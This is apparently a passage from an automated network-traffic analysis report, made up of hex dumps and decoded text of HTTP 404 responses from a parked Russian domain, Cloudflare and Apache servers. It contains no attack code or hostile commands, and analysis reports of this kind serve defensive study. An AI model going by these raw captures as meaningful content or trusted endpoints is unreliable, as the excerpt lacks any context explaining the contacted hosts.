d7 4b 82 84 07 59 0d 65 4f 59 57 0c 1e d8 ac 47 76 e8 04 71 d3 3a 53 3f bd fd c6 c5 d7 2e bd b6 7d c6 3a 35 76 bc 8e 3f 36 e3 50 da 83 2d 1e f0 96 2f 3b a2 21 ba 23 cf 8e 1d df ab 54 af ed 6d 9c b2 ce ec ec 34 cf 58 75 2b 25 92 12 13 d8 1c 86 37 4a cb c9 54 ca d6 50 7a 4e 57 45 b1 79 39 2a 57 4b 18 af c2 d0 0f 9f 72 42 4d ac 63 4e 14 da 8d 52 91 10 54 92 a9 78 14 77 59 c5 cf cc 17 d9 0b b4 46 12 89 9e 9a b7 c5 49 45 fe 16 fa 4e e2 d1 d2 c6 da f6 3b 93 cc ac db 46 00 5d 09 fd d5 22 f5 b5 52 53 e5 36 36 da d9 53 ab dd 6b b9 4e af 1f c3 1e 88 96 0a 8b 74 78 70 ab 95 76 10 c9 b9 16 4d 3d 35 f8 8e b3 bb 72 aa e1 f9 31 b1 14 ab 2b 58 28 f9 3a 39 4a 1e 25 07 c9 63 91 7c 97 ec 4f 3f c4 e3 bd e4 70 fa d1 f4 06 9e 0f f1 77 94 dc 4d f6 a9 fb ee 9a d7 8e 82 8d 3a 5c 51 3b 6d db 20 ab cd 6c b5 1f c7 41 74 c1 b2 e0 79 26 7c 57 3b 83 e7 77 7d d7 f5 c7 c2 f3 fd 40 c1 4a f0 00 3f 80 b5 a8 10 f6 2c c3 1e 79 74 ab 0d 97 1f 80 99 bf d2 ea e6 f4 c3 e9 cd ba 25 9b 75 0b fb 68 d6 17 36 d3 53 ad 56 ea e6 c6 38 94 41 00 a2 a9 80 17 db 5b ec 8b 2d f8 02 30 61 e5 20 56 4b df 8f 62 20 88 11 c5 32 76 6c 28 60 61 d5 39 59 1b e9 fa a4 a7 f5 99 34 16 34 62 30 34 94 96 81 46 7f bd 59 0f 56 4f ec 28 6d c2 f0 d3 67 57 54 bd 1d 36 93 43 ad ab e4 07 52 62 f2 03 2b f6 c1 31 55 ce c9 3b 58 b5 e7 f6 28 8e 7d 2f ca 84 8d 4d 17 2c 40 77 82 4b fd 00 0d b8 7e d8 62 15 2b cf 26 3b 4b 3b 22 e7 aa 6a 41 f9 43 e9 b2 26 52 81 e6 f3 73 e1 a5 e3 59 2b 40 e3 02 89 40 76 3a d0 51 cb 25 b3 59 34 3b 82 66 6d 7a d6 b8 ef 3b 91 b5 69 f7 95 3d 68 ac 75 38 44 1c 43 ee 35 39 0c 36 30 a1 15 f9 a3 d0 56 8d 6c 7d c2 e4 52 f3 37 44 82 6c 50 14 37 4b 2e 53 64 9e 41 bb e0 89 27 6f a6 e3 0f a5 93 43 7b e6 2e 05 be f5 00 cb 53 63 6b 73 14 0f 33 ce 8e b3 4e 9d 14 5a 46 c3 8c ed 35 6a b2 b1 25 e9 f4 bc 46 04 11 79 9d 16 08 9d bc cb e4 ef 30 89 ff 24 07 62 fa 49 72 34 fd 74 7a 53 24 f7 33 38 38 5d f0 c0 28 90 de 12 6b 0d 42 7f e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 11 Mar 2025 00:30:23 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 36 37 66 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 6d 61 70 6c 65 7a 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d0 b8 d1 8
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 00:30:56 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RrUnnIM4ea%2FlH38ryxELBEWeEez95%2BHJdOp8ONUEi4Wd9FeQLpH1WLNhiY4%2BkwHqC%2BCoI6KPF%2Bq2ixJPgGnWR%2BaLXxhIAP2T1o6T%2FQZALxAk5Ai7dSIMtyeV%2BF%2BpV6GxGZrJujU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91e6f230a9090f78-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1485&min_rtt=1485&rtt_var=742&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=799&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 61 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 52 4d 73 d3 30 10 bd f3 2b 1e e1 5a c7 36 29 4c c7 56 72 29 74 38 30 d0 81 f4 c0 51 91 36 91 a6 8a e4 4a eb 10 93 e1 bf 77 5c 67 1a 7b 38 70 d2 ae 76 df db b7 1f e2 ed a7 ef b7 eb 5f f7 9f 61 78 ef 56 6f c4 f0 00 80 30 24 f5 60 be b8 6c d9 d1 ea ba b8 c6 b7 c0 b8 0b ad d7 22 1f 3e 2f 49 7b 62 09 c3 dc 64 f4 d4 da c3 72 76 1b 3c 93 e7 6c dd 35 34 83 1a bc e5 8c e9 c8 79 5f ab 86 32 32 26 e2 e5 c3 fa 2e bb 99 8d b8 12 77 63 ee 4d d0 1d 4e e8 91 99 74 76 e7 2b 28 f2 4c b1 46 23 b5 b6 7e 57 a1 2c 8a e6 88 0f 45 73 ac f1 f7 15 69 4a 9c b0 0d 9e b3 64 ff 50 f5 4f fc cc dc 67 54 78 df 33 7c 21 77 20 b6 4a 5e 41 46 2b dd 15 92 f4 29 4b 14 ed b6 86 0a 2e c4 0a ef 16 8b c5 98 46 46 b6 ca 11 4e d0 36 35 4e 76 15 36 2e a8 c7 7a a2 d9 d1 96 6b fc b6 9a 4d 85 8f 83 94 bd 8c 3b eb 2b 14 90 2d 87 09 27 4e af e5 8a e2 a6 d4 ea cc a6 49 85 28 d9 06 5f c1 07 4f 13 50 65 c2 81 e2 08 fa a2 f4 bf 38 91 8f 46 2e f2 cb fe 45 3f a1 b3 79 ee 72 b4 27 53 ae fa 8b d8 f6 17 31 17 b9 29 47 b1 66 b5 36 84 48 29 b4 51 f5 c6 53 4b 89 49 43 85 d6 69 f8 c0 d8 d0 00 45 f0 60 63 13 12 c5 03 c5 b9 c8 9b 09 d1 bd 23 99 08 ca 90 7a 04 1b c2 c3 8f af 73 fc 0c 31 76 90 9b d0 32 d8 48 be c0 Data Ascii: 1a4RMs0+Z6)LVr)t80Q6Jw\g{8pv_axVo0$`l">/I{bdrv<l54y_22&.wcMNtv+(LF#~W,EsiJdPOgTx3|!w J^AF+)K.FFN65Nv6.zkM;+-'NI(_OPe8F.E?yr'S1)Gf6H)QSKICiE`c#zs1v2H
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 00:30:59 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mfe1iX4O4Q5uECethw0%2BhcMAFmIeVUKaBJChK1K8PKCVLLYVN1YCNGq%2FT9J9Tcp%2BXa8Hl9R32arnY6RL6li3%2F8w7dPA1Q7xhq1dVEUk4xrtSUvDzKwqdJm8Rw6oCRI%2FOrTOixoc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91e6f2409d754233-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1740&min_rtt=1740&rtt_var=870&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=823&delivery_rate=0&cwnd=176&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 61 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 52 4d 73 d3 30 10 bd f3 2b 1e e1 5a c7 36 29 4c c7 56 72 29 74 38 30 d0 81 f4 c0 51 91 36 91 a6 8a e4 4a eb 10 93 e1 bf 77 5c 67 1a 7b 38 70 d2 ae 76 df db b7 1f e2 ed a7 ef b7 eb 5f f7 9f 61 78 ef 56 6f c4 f0 00 80 30 24 f5 60 be b8 6c d9 d1 ea ba b8 c6 b7 c0 b8 0b ad d7 22 1f 3e 2f 49 7b 62 09 c3 dc 64 f4 d4 da c3 72 76 1b 3c 93 e7 6c dd 35 34 83 1a bc e5 8c e9 c8 79 5f ab 86 32 32 26 e2 e5 c3 fa 2e bb 99 8d b8 12 77 63 ee 4d d0 1d 4e e8 91 99 74 76 e7 2b 28 f2 4c b1 46 23 b5 b6 7e 57 a1 2c 8a e6 88 0f 45 73 ac f1 f7 15 69 4a 9c b0 0d 9e b3 64 ff 50 f5 4f fc cc dc 67 54 78 df 33 7c 21 77 20 b6 4a 5e 41 46 2b dd 15 92 f4 29 4b 14 ed b6 86 0a 2e c4 0a ef 16 8b c5 98 46 46 b6 ca 11 4e d0 36 35 4e 76 15 36 2e a8 c7 7a a2 d9 d1 96 6b fc b6 9a 4d 85 8f 83 94 bd 8c 3b eb 2b 14 90 2d 87 09 27 4e af e5 8a e2 a6 d4 ea cc a6 49 85 28 d9 06 5f c1 07 4f 13 50 65 c2 81 e2 08 fa a2 f4 bf 38 91 8f 46 2e f2 cb fe 45 3f a1 b3 79 ee 72 b4 27 53 ae fa 8b d8 f6 17 31 17 b9 29 47 b1 66 b5 36 84 48 29 b4 51 f5 c6 53 4b 89 49 43 85 d6 69 f8 c0 d8 d0 00 45 f0 60 63 13 12 c5 03 c5 b9 c8 9b 09 d1 bd 23 99 08 ca 90 7a 04 1b c2 c3 8f af 73 fc 0c 31 76 90 9b d0 32 d8 48 be c0 44 3e 91 2a f2 a1 09 91 Data Ascii: 1a4RMs0+Z6)LVr)t80Q6Jw\g{8pv_axVo0$`l">/I{bdrv<l54y_22&.wcMNtv+(LF#~W,EsiJdPOgTx3|!w J^AF+)K.FFN65Nv6.zkM;+-'NI(_OPe8F.E?yr'S1)Gf6H)QSKICiE`c#zs1v2HD>*
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 00:31:01 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y7jCdLTsuJDnNg2qJF9q2APlYuhwslpM0l52YsJtICUCWehYM8CDNz8vMiB5pOUE0PvbJtAAJ%2FP6Q8jnefsJGtnMaaFxjQYP65BrNthLI%2Bti1t8kMtShOaox7Ka9aDIchFWVSNo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91e6f250aae4f3ba-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2025&min_rtt=2025&rtt_var=1012&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=983&delivery_rate=0&cwnd=60&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 61 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 52 4d 73 d3 30 10 bd f3 2b 1e e1 5a c7 36 29 4c c7 56 72 29 74 38 30 d0 81 f4 c0 51 91 36 91 a6 8a e4 4a eb 10 93 e1 bf 77 5c 67 1a 7b 38 70 d2 ae 76 df db b7 1f e2 ed a7 ef b7 eb 5f f7 9f 61 78 ef 56 6f c4 f0 00 80 30 24 f5 60 be b8 6c d9 d1 ea ba b8 c6 b7 c0 b8 0b ad d7 22 1f 3e 2f 49 7b 62 09 c3 dc 64 f4 d4 da c3 72 76 1b 3c 93 e7 6c dd 35 34 83 1a bc e5 8c e9 c8 79 5f ab 86 32 32 26 e2 e5 c3 fa 2e bb 99 8d b8 12 77 63 ee 4d d0 1d 4e e8 91 99 74 76 e7 2b 28 f2 4c b1 46 23 b5 b6 7e 57 a1 2c 8a e6 88 0f 45 73 ac f1 f7 15 69 4a 9c b0 0d 9e b3 64 ff 50 f5 4f fc cc dc 67 54 78 df 33 7c 21 77 20 b6 4a 5e 41 46 2b dd 15 92 f4 29 4b 14 ed b6 86 0a 2e c4 0a ef 16 8b c5 98 46 46 b6 ca 11 4e d0 36 35 4e 76 15 36 2e a8 c7 7a a2 d9 d1 96 6b fc b6 9a 4d 85 8f 83 94 bd 8c 3b eb 2b 14 90 2d 87 09 27 4e af e5 8a e2 a6 d4 ea cc a6 49 85 28 d9 06 5f c1 07 4f 13 50 65 c2 81 e2 08 fa a2 f4 bf 38 91 8f 46 2e f2 cb fe 45 3f a1 b3 79 ee 72 b4 27 53 ae fa 8b d8 f6 17 31 17 b9 29 47 b1 66 b5 36 84 48 29 b4 51 f5 c6 53 4b 89 49 43 85 d6 69 f8 c0 d8 d0 00 45 f0 60 63 13 12 c5 03 c5 b9 c8 9b 09 d1 bd 23 99 08 ca 90 7a 04 1b c2 c3 8f af 73 fc 0c 31 76 90 9b d0 32 d8 48 be c0 44 3e 91 2a f2 a1 09 91 0f 27 fe 0c ed 25 Data Ascii: 1a4RMs0+Z6)LVr)t80Q6Jw\g{8pv_axVo0$`l">/I{bdrv<l54y_22&.wcMNtv+(LF#~W,EsiJdPOgTx3|!w J^AF+)K.FFN65Nv6.zkM;+-'NI(_OPe8F.E?yr'S1)Gf6H)QSKICiE`c#zs1v2HD>*'%
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 00:31:04 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E8d2kdjLvtip793GUyWipuvBbtrayF0yxt9eFpvLOZIaHkqS0ap34i%2Bs3V9VVQNUh3wy1NMO2MdeX5BVCXmIa2Ie7dy06Xf%2B9GtYDoPoyVFvALM8v4ewbc8FL90mo2Pz9XgsGr8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91e6f2609842b637-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1646&min_rtt=1646&rtt_var=823&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=531&delivery_rate=0&cwnd=73&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 66 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 35 30 70 78 3b 20 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 70 78 3b 20 7d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 20 66 6f 6e 74 3a 20 32 30 70 78 20 48 65 6c 76 65 74 69 63 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 20 7d 0a 20 20 20 20 20 20 20 20 61 72 74 69 63 6c 65 20 7b 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 20 77 69 64 74 68 3a 20 36 35 30 70 78 3b 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 20 7d 0a 20 20 20 20 20 20 20 20 61 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 38 31 64 63 3b 20 74 65 78 Data Ascii: 2fa<!DOCTYPE html><html> <head> <title>404 Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style> body { text-align: center; padding: 100px 50px; } h1 { font-size: 50px; } body { font: 20px Helvetica, arial, sans-serif; color: #333; } article { display: block; text-align: left; width: 650px; margin: 0 auto; } a { color: #0081dc; tex
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 00:31:10 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 6d 75 38 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dmu8/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 00:31:12 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 6d 75 38 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dmu8/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 00:31:15 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 6d 75 38 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dmu8/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 00:31:17 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 6d 75 38 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dmu8/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 00:31:23 GMTServer: ApacheContent-Length: 13840Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 6c 65 66 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 31 35 30 70 78 20 31 35 36 70 78 3b 0a 7d 0a 0a 2e 72 69 67 68 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 